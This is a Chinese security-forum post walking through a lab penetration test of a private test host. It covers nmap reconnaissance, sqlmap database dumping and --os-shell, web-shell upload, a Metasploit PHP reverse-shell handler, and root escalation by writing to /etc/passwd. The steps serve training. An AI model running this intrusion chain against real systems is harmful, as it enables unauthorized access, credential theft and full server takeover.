用户
搜索
  • TA的每日心情
    开心
    14 小时前
  • 签到天数: 296 天

    连续签到: 84 天

    [LV.8]以坛为家I

    i春秋-核心白帽

    Rank: 4

    12

    主题

    66

    帖子

    1996

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2019-11-4

    核心白帽春秋游侠白帽高手积极活跃奖

    发表于 7 天前 01164
    本帖最后由 和風 于 2021-7-16 22:17 编辑

    本篇文章作者和風,本篇文章参与i春秋作家连载计划所属和風,未经许可,禁止转载。连载方向:web安全,内网安全

    前言
    通过信息收集,收集网站可能存在的漏洞,然后进行漏洞复现,攻击外网服务器,从而获取外网服务器的权限,进而对服务器进行提权、留后门等操作。
    目录:
    一、记一次web渗透过程
    二、web渗透---SQL盲注漏洞
    三、XSS与CSRF的联合使用
    四、web渗透---文件包含漏洞
    五、web渗透---命令执行漏洞
    六、web渗透---报错注入漏洞

    信息收集:
    Nmap -sP 10.10.10.0/24
    对10.10.10.10.0网段进行收集,收集存活的主机ip

    nmap -sT- O 10.10.10.128
    对该ip进行端口的枚举爆破

    收集网站的路径目录信息

    利用椰树对网站进行一个漏洞扫描(目录信息收集)

    利用AWVS扫描器对网站进行一个全面的扫描,收集信息

    漏洞利用
    找到了存在sql注入漏洞的页面 http://10.10.10.128/se3reTdir777/
    用sqlmap跑出数据库(aiweb1和information_schema)

    Sqlmap -r/root/2.txt --dump -D aiweb1
    跑出aiweb1数据库下的信息

    账号:t00r           密码:FakeUserPassw0rd
    账号:aiweb1pwn  密码:MyEvilPass_f908sdaf9_sadfasf0sa
    账号:u3er    密码:N0tThis0neAls0


    dirb http://10.10.10.128
    dirb指令获取网站目录 (将之前信息收集的网站目录都放进去看看有没有子目录出来)

    枚举路径找到了一个phpinfo页面

    在phpinfo界面看到了网站的根目录/home/www/html/web1x443290o2sdf92213

    枚举路径找到上传的路径,但是打开该网页没有服务

    执行Sqlmap工具的--os-shell
    尝试找到网站根路径(把之前phpinfo的根路径放进去子目录添加)
    最后在上传路径下找到了,然后找到了上传的点

    找到上传路径后,寻找是否存在文件上传漏洞,上小马,传大马,这里两者都没有做限制直接上传了

    大马连接文件管理

    小马连接中国蚁剑

    在蚁剑的文件管理中找到了一个数据库配置文件,有了用户名跟密码(信息泄露)

    中国蚁剑连接数据库

    思路一:
    利用中国蚁剑的虚拟终端添加root用户

    切换交互式界面失败

    可以利用反弹shell来获取虚拟终端

    思路二:
    只利用kali进行
    php脚本反弹shell

    file-write 从本地写入,file-dest 写入目标路径(必须是dba权限)

    浏览上传php脚本的页面触发反弹shell

    开启监听

    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 10.10.10.129
    set lport 8080
    run


    发现/etc/passwd这个目录是可读写的,openssl passwd创建一个web123用户并产生密文

    openssl passwd -1 -salt xxxxxxxx password
    Prints $1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.
    -l:使用MD5加密
    -salt:使用指定的盐。当读取来自终端的密码(web123)


    密文字符串格式为:$id$salt$encrypted,通过$来分割,其中$id用来指定使用的算法(这里是MD5算法,$id=1)


    当非交互式界面无法切换时
    python -c 'import pty;pty.spawn("/bin/bash")'
    进入交互式界面切换用户
    切换root用户

    总结
    在做渗透测试的时候尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取shell,方便进行下一步的渗透测试

    剑未佩妥出门已是江湖
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册